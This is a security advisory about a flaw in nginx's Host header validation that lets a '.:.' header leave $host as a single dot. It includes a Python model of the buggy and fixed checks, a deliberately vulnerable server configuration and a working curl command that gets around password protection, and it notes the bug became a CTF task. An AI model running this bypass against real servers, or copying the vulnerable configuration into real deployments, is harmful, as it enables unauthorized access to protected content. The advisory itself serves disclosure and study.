Nginx 1.25.5 Host Header Validation

24 Apr 2024 00:00:00 | Reported by dhteam | Type: packetstorm | Source: packetstormsecurity.com | 754 Views


# Nginx =< 1.25.5 $host variable validation bug  
  
## Intro:  
  
The "Host" header sent to an Nginx web server cannot contain just a dot or something like that, because filtering rules exist there.  
The ngx_http_validate_host function is responsible for that filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).  
  
## What it validates:  
  
+ two dots in a row are not allowed  
+ colon and everything after it are stripped off  
+ if "Host" header starts with "[", then after "]" everything is deleted  
+ path separators are not allowed  
+ chars ≤ 0x20 or == 0x7f are not allowed  
+ if there is a dot at the end, it is removed  
+ if after all deletions the host length is zero, error occurs  
  
## The bug itself:   
  
dot_pos can be greater than host_len: if the last dot falls inside the stripped part, the trailing-dot check is made against that dot, so a dot that is the last unstripped character (the first dot in this case) is not deleted.  
  
So, if the "Host" header payload is .:. , the colon and the dot after it are stripped, but the first dot remains untouched and the Nginx $host variable now contains only a single dot character, which cannot happen under normal conditions.  
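To make the dot_pos / host_len bookkeeping concrete, here is an added Python model of the validation rules listed above (my own code, not nginx's; it follows the state machine of the linked C function as I read it and only treats "/" as a path separator, as on Unix), with a variant beside it that performs the trailing-dot check on the last byte actually kept:

```python
# Python model of the "Host" validation rules the advisory lists (assumption:
# mirrors the dot_pos / host_len bookkeeping of ngx_http_validate_host).

def _scan(host: str):
    """Apply the per-character rules; return (kept_length, dot_pos)
    or None when the header is rejected outright."""
    dot_pos = len(host)            # "no dot seen yet" sentinel
    host_len = len(host)
    state = "usual"                # usual | literal | rest
    for i, ch in enumerate(host):
        if ch == ".":
            if dot_pos == i - 1:   # two dots in a row are not allowed
                return None
            dot_pos = i
        elif ch == ":":
            if state == "usual":   # colon and everything after it are stripped
                host_len = i
                state = "rest"
        elif ch == "[":
            if i == 0:
                state = "literal"
        elif ch == "]":
            if state == "literal": # keep "[...]", drop everything after it
                host_len = i + 1
                state = "rest"
        else:
            if ch == "/":          # path separators are not allowed
                return None
            if ord(ch) <= 0x20 or ord(ch) == 0x7F:
                return None
    return host_len, dot_pos

def validate_host_buggy(host: str):
    """Trailing-dot removal keyed on dot_pos, as the advisory describes."""
    r = _scan(host)
    if r is None:
        return None
    host_len, dot_pos = r
    # A dot after the colon moves dot_pos past host_len, so a dot that is
    # the last kept byte (e.g. ".:.") is never removed.
    if dot_pos == host_len - 1:
        host_len -= 1
    return host[:host_len] if host_len else None

def validate_host_fixed(host: str):
    """Same scan, but the trailing-dot check looks at the kept bytes."""
    r = _scan(host)
    if r is None:
        return None
    host_len, _ = r
    if host_len and host[host_len - 1] == ".":
        host_len -= 1
    return host[:host_len] if host_len else None
```

With the buggy variant `.:.` survives as a lone `.`, while `.` and `.:` are rejected because their host length drops to zero; the fixed variant rejects all three.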
  
## Vulnerable Nginx server configuration example:  
  
```nginx
server {
    root /sites/$host;
    index index.html;
    server_name _;

    location / {
        try_files $uri $uri/ =404;
    }
}

server {
    server_name "";

    location / {
        return 418 "I'm a teapot.";
    }
}

server {
    root /sites/protected-host.example.com;
    index flag.html;
    server_name protected-host.example.com;
    auth_basic "Protected File Storage";
    auth_basic_user_file /.htpasswd;

    location / {
        try_files $uri $uri/ =404;
    }
}
```
  
## Exploit (unauthorized access to password-protected host in this case):  
  
```shell
curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html
```
  
P.S.  
The bug was sent to [email protected], but the Nginx dev team said that the ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it a task in the Tinkoff CTF contest.  
